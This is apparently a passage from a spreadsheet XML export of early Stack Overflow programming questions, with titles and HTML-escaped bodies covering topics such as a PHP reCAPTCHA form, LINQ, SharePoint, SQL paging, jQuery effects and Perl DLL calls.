&amp;lt;label&amp;gt;Asunto&amp;lt;/label&amp;gt;&amp;lt;INPUT class="textbox" type="text" name="subject" value=""&amp;gt;&amp;lt;br /&amp;gt;
&amp;lt;label&amp;gt;Mensaje&amp;lt;/label&amp;gt;&amp;lt;TEXTAREA class="textbox" NAME="message" ROWS="5" COLS="25"&amp;gt;&amp;lt;/TEXTAREA&amp;gt;&amp;lt;br /&amp;gt;
&amp;lt;?php
require_once('recaptchalib.php');
// Get a key from http://recaptcha.net/api/getkey
$publickey = "6LekPAQAAAAAAFoAJRfRtd9vmlzA9m-********";
$privatekey = "6LekPAQAAAAAAFqNcNsrnZba0-ZMg-********";
# the response from reCAPTCHA
$resp = null;
# the error code from reCAPTCHA, if any
$error = null;
# was there a reCAPTCHA response?
if ($_POST["recaptcha_response_field"]) {
        $resp = recaptcha_check_answer ($privatekey,
                                        $_SERVER["REMOTE_ADDR"],
                                        $_POST["recaptcha_challenge_field"],
                                        $_POST["recaptcha_response_field"]);
        if ($resp-&amp;gt;is_valid) {
                echo "Bien escrito!";
        } else {
                # set the error code so that we can display it
                $error = $resp-&amp;gt;error;
        }
}
echo recaptcha_get_html($publickey, $error);
?&amp;gt;
    &amp;lt;br/&amp;gt;
&amp;lt;label&amp;gt;&amp;amp;nbsp;&amp;lt;/label&amp;gt;&amp;lt;INPUT class="button" type="submit" name="submit" value="Enviar"&amp;gt;
&amp;lt;/form&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/fieldset&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks a lot.&lt;/p&gt;
&lt;p&gt;David.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you do an IN or CONTAINS in LINQ using LAMBDA expressions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following Transact-Sql that I am trying to convert to LINQ ... and struggling.  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM Project
WHERE Project.ProjectId IN (SELECT ProjectId FROM ProjectMember Where MemberId = 'a45bd16d-9be0-421b-b5bf-143d334c8155')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any help would be greatly appreciated ... I would like to do it with Lambda expressions, if possible.  &lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Web Setup</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 3 web projects in a Visual studio solution.I want to create a single web setup project which should install all 3 web projects in their virtual directories.So how to create a single web setup project which supports multiple web application installation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Skipping a column in FileHelper</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using the &lt;a href="http://www.filehelpers.net/" rel="nofollow"&gt;FileHelper&lt;/a&gt; library for .Net, can I  somehow skip a number of columns from the source file?&lt;/p&gt;
&lt;p&gt;According to docs and samples, I have to add fields for all columns. Alas, I have an excel sheet with 216 columns to import, from which as few as 13 are necessary.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it true that the smallest memory allocation in .net is a byte?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it true that the smallest amount of memory that I can allocate in managed code is a byte? &lt;/p&gt;
&lt;p&gt;Do I understand correctly that a Boolean variable takes up much more than a bit of memory? &lt;/p&gt;
&lt;p&gt;Is there a way for me to allocate memory, in .net, in chunks smaller than a byte?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Reporting Services - Restrict Export Formats</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to limit export formats only PDF and Excel ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing calendar entries on the iPhone/iPod touch</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;is it possible to access calendar entries on the iPhone/iPod touch, i.e. reading, creating, changing, deleting appointments?&lt;/p&gt;
&lt;p&gt;I searched the iPhone SDK documentation but didn't find anything. Perhaps I missed something.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to cancel the 'system key down' state in Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Windows, when you press Alt, and release it again, the menu bar gets activated. However, when you press Alt, then click, then release, the menu bar does not get activated because presumably you wanted to Alt+click, not activate the menu bar.&lt;/p&gt;
&lt;p&gt;I want to support Alt+mouse wheel changes (which would map to horizontal scrolling). This works fine, but if you are ready and release the Alt key, the menu bar activates. Obviously this is not desirable. There must be some kind of action that Windows does internally when you Alt+click to cancel the internal 'ActivateMenuBarWhenAltIsReleased' flag. If I know what it is, I can do this myself when I receive a mouse wheel message.&lt;/p&gt;
&lt;p&gt;So, does anyone know how the system works that activates the menu bar when you press and release Alt, and how to cancel this? Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Return file from python module</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Edit: How to return/serve a file from a python controller (back end) over a web server, with the file_name? as suggested by @JV&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Create a Managed Path through SharePoint Object Model</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a question for a WSS/SharePoint guru. &lt;/p&gt;
&lt;p&gt;Consider this scenario: I have an ASP.Net web service which links our corporate CRM system and WSS-based intranet together. What I am trying to do is provision a new WSS site collection whenever a new client is added to the CRM system. In order to make this work, I need to programmatically add the managed path to the new site collection. I know that this is possible via the Object Model, but when I try it in my own web service, it fails. Sample code extract below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
Dim _ClientSiteUrl As String = "http://myintranet/clients/sampleclient"
        Using _RootWeb As SPSite = New SPSite("http://myintranet")
            Dim _ManagedPaths As SPPrefixCollection = _RootWeb.WebApplication.Prefixes
            If Not (_ManagedPaths.Contains(_ClientSiteUrl)) Then
                _ManagedPaths.Add(_ClientSiteUrl, SPPrefixType.ExplicitInclusion)
            End If
        End Using
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;This code fails with a NullReferenceException on SPUtility.ValidateFormDigest(). Research suggested that this may be due to insufficient privileges, I tried running the code within an elevated privileges block using SPSecurity.RunWithElevatedPrivileges(AddressOf AddManagedPath), where AddManagedPath is a Sub procedure containing the above code sample.&lt;/p&gt;
&lt;p&gt;This then fails with an InvalidOperationException, "Operation is not valid due to the current state of the object."&lt;/p&gt;
&lt;p&gt;Where am I going wrong?&lt;/p&gt;
&lt;p&gt;One workaround I have managed to do is to call out to STSADM.EXE via Process.Start(), supplying the requisite parameters, and this works.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; whilst developing the web service, I am running it using the built-in Visual Studio 2005 web server - what security context will this be running under? Can I change the security context by putting entries in web.config?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; I think the problem is definitely to do with not running the web service within the correct SharePoint security context. I decided to go with the workaround I suggested and shell out to STSADM, although to do this, the application pool identity that the web service runs under must be a member of the SharePoint administrators.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>what is the difference between stringstream clear and str</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just wanted to know what's the difference between clear() and str("");&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;stringstream ss("Stack Overflow");
ss.clear();
ss.str("");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I wanted to know the underlying technical difference.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>pubs database documentation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;is there a documentation of the pubs database (it comes as a demo DB for SQL 2000)? for example, what is the roysched table? what represents lowqty and hightqty and discount columns from the discount table? minlvl and maxlvl from jobs table?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create an XPS document?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to create an XPS document for storing and printing.&lt;/p&gt;
&lt;p&gt;What is the easiest way to create an XPS document (for example with a simple grid with some data inside) in my program, and to pass it around?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to run MSVC++ 6.0 off a USB drive as a portable app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Without using any third party program to do this (i.e. without VMware ThinApp, U3 or MojoPac etc.) How to move MSVC++ 6.0 from from its install on C: over to a USB drive? So that it can be used on different PCs with no admin rights and without installing anything on the host PC? Even if it's only usable as a console application would be fine, although to have the GUI including Visual Assist etc. would be even better. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Weighted random selection with and without replacement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently I needed to do weighted random selection of elements from a list, both with and without replacement. While there are well known and good algorithms for unweighted selection, and some for weighted selection without replacement (such as modifications of the resevoir algorithm), I couldn't find any good algorithms for weighted selection with replacement. I also wanted to avoid the resevoir method, as I was selecting a significant fraction of the list, which is small enough to hold in memory.&lt;/p&gt;
&lt;p&gt;Does anyone have any suggestions on the best approach in this situation? I have my own solutions, but I'm hoping to find something more efficient, simpler, or both.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it true that using "this." before the parameters in c# uses more memory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;than just to call the parameter as it is?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Signal and slot connection in .ui</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have started to play a little with Qt 4. And then I have come across a problem with the Qt Designer. In the Signal/Slots editor I can only setup the connections that is listed there, and not all the slots is listed. If I try to add it manualy in the .ui file, the connection would not work. If I add it in the ui_*.h file it workes fine, but then the connection is deleted when I change the design. Does anyone have any good tips to how I can get around this bug? Or to ask another way: How can I make the Qt Designer list all the availible slots?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When to catch java.lang.Error?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In what situations should one catch &lt;code&gt;java.lang.Error&lt;/code&gt; on an application?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>With XSLT/XPath, how can I match any element in the null namespace?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;&amp;lt;xsl:template match="foo"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;matches the foo element in the null namespace.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;xsl:template match="*"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;matches any element in &lt;em&gt;any&lt;/em&gt; namespace.&lt;/p&gt;
&lt;p&gt;I tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;xmlns:null=""
...
&amp;lt;xsl:template match="null:*"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but it's illegal to declare a prefix for the null namespace.&lt;/p&gt;
&lt;p&gt;So how can I match an element with any name in the null namespace?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I prevent Windows from catching my Perl exceptions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this Perl software that is supposed to run 24/7. It keeps open a connection to an IMAP server, checks for new mail and then classifies new messages.&lt;/p&gt;
&lt;p&gt;Now I have a user that is hibernating his XP laptop every once in a while. When this happens, the connection to the server fails and an exception is triggered. The calling code usually catches that exception and tries to reconnect. But in this case, it seems that Windows (or Perl?) is catching the exception and delivering it to the user via a message box.&lt;/p&gt;
&lt;p&gt;Anyone know how I can prevent that kind of wtf? Could my code catch a "system-is-about-to-hibernate" signal?&lt;/p&gt;
&lt;p&gt;To clear up some points you already raised:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I have no problem with users hibernating their machines. I just need to find a way to deal with that.&lt;/li&gt;
&lt;li&gt;The Perl module in question does throw an exception. It does something like "die 'foo bar'. Although the application is completely browser based and doesn't use anything like Wx or Tk, the user gets a message box titled "poll_timer". The content of that message box is exactly the contents of $@ ('foo bar' in this example).&lt;/li&gt;
&lt;li&gt;The application is compiled into an executable using &lt;a href="http://docs.activestate.com/pdk/7.3/PerlApp.html" rel="nofollow"&gt;perlapp&lt;/a&gt;. The documentation doesn't mention anything about exception handling, though.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Clean document roles in a Doc Library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been developing an event handler to clean up the RolesAssignments of the new item of a document library in MOSS. Iâ€™ve searched for a method that could clean all the RolesAssignments efficiently, although  the best way I found seams to be loop through the RolesAssignments and delete one by one?  Is there another way to clean all the RolesAssignments for an item?&lt;/p&gt;
&lt;p&gt;The code Iâ€™m using for cleaning the RolesAssignments look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    for (int i = ListItem.RoleAssignments.Count - 1; i &amp;gt;= 0; --i)
    { 
        ListItem.RoleAssignments.Remove(i); 
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone have any ideas on how to deal with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does a truststore need the sub-ca certificate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to setup a hierarchical PKI. Can I create a truststore containing only the root ca certificate, and will that mean my application trusts certificates signed by a sub-ca certificate which is in turn signed by the root ca?&lt;/p&gt;
&lt;p&gt;As an aside, it seems that you must provide an entire certificate chain, including the root ca certificate. Surely if the root ca is trusted, the certificate shouldn't need to be sent? We just want to check if the next certificate down is signed by it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL - Temp Table: Storing all columns in temp table versus only Primary key</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would need to create a temp table for paging purposes. I would be selecting all records into a temp table and then do further processing with it.&lt;/p&gt;
&lt;p&gt;I am wondering which of the following is a better approach:&lt;/p&gt;
&lt;p&gt;1) Select all the columns of my Primary Table into the Temp Table and then being able to select the rows I would need&lt;/p&gt;
&lt;p&gt;OR&lt;/p&gt;
&lt;p&gt;2) Select only the primary key of the Primary Table into the Temp Table and then joining with the Primary Table later on?&lt;/p&gt;
&lt;p&gt;Is there any size consideration when working with approach 1 versus approach 2?&lt;/p&gt;
&lt;p&gt;[EDIT]&lt;/p&gt;
&lt;p&gt;I am asking because I would have done the first approach but looking at PROCEDURE [dbo].[aspnet_Membership_FindUsersByName], that was included with ASP.NET Membership, they are doing Approach 2&lt;/p&gt;
&lt;p&gt;[EDIT2]&lt;/p&gt;
&lt;p&gt;With people without access to the Stored procedure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  -- Insert into our temp table
INSERT INTO #PageIndexForUsers (UserId)
    SELECT u.UserId
    FROM   dbo.aspnet_Users u, dbo.aspnet_Membership m
    WHERE  u.ApplicationId = @ApplicationId AND m.UserId = u.UserId AND u.LoweredUserName LIKE LOWER(@UserNameToMatch)
    ORDER BY u.UserName
SELECT  u.UserName, m.Email, m.PasswordQuestion, m.Comment, m.IsApproved,
        m.CreateDate,
        m.LastLoginDate,
        u.LastActivityDate,
        m.LastPasswordChangedDate,
        u.UserId, m.IsLockedOut,
        m.LastLockoutDate
FROM   dbo.aspnet_Membership m, dbo.aspnet_Users u, #PageIndexForUsers p
WHERE  u.UserId = p.UserId AND u.UserId = m.UserId AND
       p.IndexId &amp;gt;= @PageLowerBound AND p.IndexId &amp;lt;= @PageUpperBound
ORDER BY u.UserName
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>SQL query (order by)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to list (a sorted list) all my entries from an attribute called streetNames in my table/relation Customers.
eg. I want to achieve the following order: &lt;/p&gt;
&lt;p&gt;Street_1A&lt;br /&gt;
Street_1B&lt;br /&gt;
Street_2A&lt;br /&gt;
Street_2B&lt;br /&gt;
Street_12A&lt;br /&gt;
Street_12B  &lt;/p&gt;
&lt;p&gt;A simple order by streetNames will do a lexical comparision and then Street_12A and B will come before Street_2A/B, and that is not correct. Is it possible to solve this by pure SQL?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery fadeIn, fadeOut effects in IE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The below &lt;a href="http://docs.jquery.com/Effects/fadeIn" rel="nofollow"&gt;fadeIn&lt;/a&gt;, &lt;a href="http://docs.jquery.com/Effects/fadeOut" rel="nofollow"&gt;fadeOut&lt;/a&gt; effect works fine in Firefox 3.0 but it doesn't work in IE 7 ... Whay is that and what's the trick? The idea is of course to get a "blink" effect and attract the attention of the user to a specific row in a table.    &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function highLightErrorsAndWarnings() {
            $(".status-error").fadeIn(100).fadeOut(300).fadeIn(300).fadeOut(300).fadeIn(300).fadeOut(300).fadeIn(300);
            $(".status-warning").fadeIn(100).fadeOut(300).fadeIn(300).fadeOut(300).fadeIn(300).fadeOut(300).fadeIn(300);
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; Found the stupid problem ... ".status-error" points to a tr-element. It's possible to the set the background-color and fade it on a tr in Firefox but not in IE. Changing the "CSS pointer" to ".status-error &lt;strong&gt;&lt;em&gt;td&lt;/em&gt;&lt;/strong&gt;" made it point to the td below the tr and everything worked in all browsers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Exclude complete namespace from FxCop code analysis?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to exclude a complete namespace from all FxCop analysis while still analyzing the rest of the assembly using the &lt;code&gt;SuppressMessageAttribute&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;In my current case, I have a bunch of classes generated by LINQ to SQL which cause a lot of FxCop issues, and obviously, I will not modify all of those to match FxCop standards, as a lot of those modifications would be gone if I re-generated the classes.&lt;/p&gt;
&lt;p&gt;I know that FxCop has a project option to suppress analysis on generated code, but it does not seem to recognize the entity and context classes created by LINQ 2 SQL as generated code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I find the name of the calling function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been using PRETTY_FUNCTION to output the current function name, however I have reimplemented some functions and would like to find out which functions are calling them.&lt;/p&gt;
&lt;p&gt;In C++ how can I get the function name of the calling routine?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I replace an Int property with an Enum in Entity Framework?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an entity class that has a property with an underlying db column of datatype Int, however in reality I want this property to be an Enum. Is there any way to specify that this property returns an Enum?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ActiveX component can't create object (comReport)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to print a pdf report and it is not printing and giving this error. 
Error Type:
ComReport (0x800A01AD)
ActiveX component can't create object&lt;/p&gt;
&lt;p&gt;I have registered the ComReport.dll with my OS.&lt;/p&gt;
&lt;p&gt;This works fine on our developemtn and production server but is not working locally on my machine.  And I need for it to work on my local so I can debug some stuff and see what query is being ran.  Page I am trying to debug is classic asp in .net 2003.  I googled some stuff and they are just saying to make sure browser has ActiveX enabled...which it does!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I detect a ThreadAbortException in a finally block? (.NET)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some critical logic in a finally block (with an empty try block), because I want to guarantee that the code gets executed even if the thread is aborted. However, I'd also like to detect the ThreadAbortException. I've found that wrapping my critical try/finally block in a try/catch does not catch the ThreadAbortException. Is there any way to detect it?&lt;/p&gt;
&lt;pre&gt;
try {
    try { }
    finally {
        // critical logic
    }
} catch(Exception ex) {
    // ThreadAbortException is not caught here, but exceptions thrown
    // from within the critical logic are
}
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is a line of code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I realize there's no definitely "right" answer to this question, but when people talk about lines of code, what do they mean?  In C++ for example, do you count blank lines? comments? lines with just an open or close brace?&lt;/p&gt;
&lt;p&gt;I know some people use LoC as a productivity measure, and I'm wondering if there is a standard convention here.  Also, I think there's a way to get various compilers to count lines of code - is there a standard convention there?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Easiest way to get a common base class from a collection of types</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a custom property grid that displays the properties of items in a collection. What I want to do is show only the properties in the grid that are common amongst each item. I am assuming the best way to do this would be to find the the common base class of each type in the collection and display it's properties. Is there any easier way? Can you give me a code example of the best approach to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Facebook sharer, pass in a comment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to post a description/comment variable to the facebook sharer url? It's only possible for url and title as far as I can figure out.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Prevent creation of class whose member functions are all static</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;All the member variables and member functions in my class ClassA are static. &lt;/p&gt;
&lt;p&gt;If a user is trying (by mistake) to create an object of this class, he receives a warning: "ClassA, local variable never referenced", because all the functions are static, so this object is never referenced. So, I want to prevent the user from trying to create an object of this class. &lt;/p&gt;
&lt;p&gt;Would it be enough to create a private default (no variables) constructor? Or do I have to also create private copy constructor and private assignment operator (to prevent using the default constructors)? And if I do have to create them too, maybe it would be better just to create some dummy pure virtual function instead, and this will prevent the user from creating an object?&lt;/p&gt;
&lt;p&gt;Thank you&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make LINQ to XML and HTML work together?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an html table &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;table border="0" width="100%"&amp;gt;
        &amp;lt;tr class="headerbg"&amp;gt;
            &amp;lt;th width="5%"&amp;gt;
                No
            &amp;lt;/th&amp;gt;
            &amp;lt;th width="30%"&amp;gt;
                Name
            &amp;lt;/th&amp;gt;
            &amp;lt;th width="20%"&amp;gt;
                Department or Division
            &amp;lt;/th&amp;gt;
            &amp;lt;th width="25%"&amp;gt;
                Email
            &amp;lt;/th&amp;gt;
            &amp;lt;th width="20%"&amp;gt;
                Staff/Student
            &amp;lt;/th&amp;gt;
        &amp;lt;/tr&amp;gt;
        &amp;lt;tr class="bg2"&amp;gt;
            &amp;lt;td&amp;gt;
                1
            &amp;lt;/td&amp;gt;
            &amp;lt;td&amp;gt;
                &amp;lt;strong&amp;gt;&amp;lt;a class="searchLink2" href="tel_search.php?fore=Dave&amp;amp;amp;sur=Rumber"&amp;gt;Dave Rumber&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;
            &amp;lt;/td&amp;gt;
            &amp;lt;td&amp;gt;
                Medical School
            &amp;lt;/td&amp;gt;
            &amp;lt;td&amp;gt;
                &amp;lt;a class="searchLink2" href="mailto:Dave.Rumber@Home.com"&amp;gt;Dave.Rumber@Home.com&amp;lt;/a&amp;gt;
            &amp;lt;/td&amp;gt;
            &amp;lt;td&amp;gt;
                Student&amp;amp;nbsp;
            &amp;lt;/td&amp;gt;
        &amp;lt;/tr&amp;gt;
    &amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Sometimes there will be more than one row of people results.
I would like to be able to go through each row and pluck out the name and e-mail information and do some other processing. Put the data in a datagrid, and possibly into a database.&lt;/p&gt;
&lt;p&gt;I guess my question is how do I do this? &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  string table = GetContents(buffer);
  table = table.Replace("&amp;amp;nbsp;", "");
  table = table.Replace("&amp;amp;", "&amp;amp;amp;");
  XElement inters = XElement.Parse(table);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can put it into an XElement but I am not quite sure where to go from here! &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open-source IDE's with Git support</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having trouble finding an open-source IDE with support for Git. Are there any that you could point me to or recommend?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET Web Service Best Practice for multiple developers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a large ASP.NET project consisting of several hundred reports.   We are in the process of moving all the SQL Queries (running against an Oracle Database) into three web services. The web services are categorized by command, selections and report queries.  We have to deploy a sub-set of our project using a SQL*Server backend to several locations that are disconnected from the Internet.  Therefore, having all connections to the database and queries in the web services makes the application manageable and we can pull the sub-set of reports and not have to modify the code. The project is under source control using Serena ChangeMan software.   &lt;/p&gt;
&lt;p&gt;The issue is we have several programmers and they all need check out the web services files to work on their items.   We have just implemented branching, but it is slowly becoming a nightmare.   We have monthly production deliveries and sometimes items that are supposed to go into the monthly build get held up until next month.  The merging has become a manual process.&lt;/p&gt;
&lt;p&gt;I have conduct Internet Searches and Iâ€™m surprised that I have not been able to find any good â€œBest Practiceâ€ web services architecture white pages.  There are many big companies that must have faced these issues. &lt;/p&gt;
&lt;p&gt;Do most large development groups use branching?  I did read that Visual Studio Team System Database Edition could provide standard code that will allow the application to connect to different databases.  Would purchasing Team System be the best method?  Or does anyone know where I can find documentation that will help us address these issues? &lt;/p&gt;
&lt;p&gt;Thank you,
Lorie&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is storing an array of objects in ASP.NET viewstate the best solution for this?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering if storing the data in viewstate is a good idea for this given problem.
He's a simplified example of what I am trying to achieve, firstly we have a Repeater control:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:Repeater id="Repeater1" runat="server"&amp;gt;
&amp;lt;ItemTemplate&amp;gt;
&amp;lt;asp:TextBox id="Name" runat="server" /&amp;gt;
&amp;lt;asp:TextBox id="Age" runat="server" /&amp;gt;
&amp;lt;/ItemTemplate&amp;gt;
&amp;lt;/asp:Repeater&amp;gt;
&amp;lt;asp:TextBox id="NewPersonName" runat="server" /&amp;gt;
&amp;lt;asp:TextBox id="NewPersonAge" runat="server" /&amp;gt;
&amp;lt;asp:Buttin id="Button1" runat="server" Text="Add" OnClick"Button1_Click"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To keep things simple I'll forego the databinding code, as this is working it loads in the current list of people and ages and binds perfectly.&lt;/p&gt;
&lt;p&gt;The problem is with the bottom 3 controls, what I want is for the user to be able to type in a new entry, click the add button and this would then be added to the Repeater, but not persisted to the database.&lt;/p&gt;
&lt;p&gt;The user should be able to add multiple names to the list and then click a Save button to commit all the new names in one click rather than committing for each entry.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does OpenID authentication work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a little curious to know about how OpenID authentication works.&lt;/p&gt;
&lt;p&gt;Is there any difference between OpenID authentication and the authentication which sites use exclusively for themselves?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I do a join in SQL based on table name?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, so we have a bunch of tables that are named like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;training_data_001
training_data_002
training_data_003
training_data_004
training_data_005
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then to find those we look at a field in another table, let's just call it master.training_type.&lt;/p&gt;
&lt;p&gt;Anyway, I was wondering if anyone knew of a way to do a weird table name based join with this kind of data.  Something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT foo FROM master WHERE id = ? 
INNER JOIN training_data_${master.training_type}
ON foo.id = training_data_${master.training_type}.foo_id
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know that I can do this on the client side, but it would be nice to have the db do it.&lt;/p&gt;
&lt;p&gt;Also note: it's SQL Server.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: I decided to just do it on the client side.  Thanks anyway everyone.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;-fREW&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Large MySQL tables</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For a web application I'm developing, I need to store a large number of records. Each record will consist of a primary key and a single (short-ish) string value. I expect to have about 100GB storage available and would like to be able to use it all.&lt;/p&gt;
&lt;p&gt;The records will be inserted, deleted and read frequently and I must use a MySQL database.  Data integrity is not crucial, but performance is. What issues and pitfalls am I likely to encounter and which storage engine would be best suited to the task?&lt;/p&gt;
&lt;p&gt;Many thanks, J&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I pass pointers to a DLL using Win32:API?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to passing in 3 pointers to a DLL function. I have:&lt;/p&gt;
&lt;pre&gt;
{
$code=1;
$len=100;
$str=" " x $len;
$function = new Win32::API(DLLNAME,'dllfunction','PPP','V');
$function-&gt;Call($code,$str,$len);
}
&lt;/pre&gt;
&lt;p&gt;The DLL is defined as &lt;code&gt;void dllfunction(int* a, char* str, int* len);&lt;/code&gt; The DLL will modify all the variables pointed by the three pointers.&lt;/p&gt;
&lt;p&gt;However, I am segfaulting when I run this. The documentation for &lt;a href="http://search.cpan.org/dist/Win32-API" rel="nofollow"&gt;Win32::API&lt;/a&gt; specified that I should use actual variable name instead of the Perl variable references. Can anyone tell me what I am missing? Thanks.&lt;/p&gt;
&lt;p&gt;*more information:&lt;/p&gt;
&lt;p&gt;I added &lt;code&gt;printf()&lt;/code&gt; in the DLL to print out the address of the three pointers, and &lt;code&gt;printf&lt;/code&gt; in Perl to print out the reference of the three variables. And I get the following&lt;/p&gt;
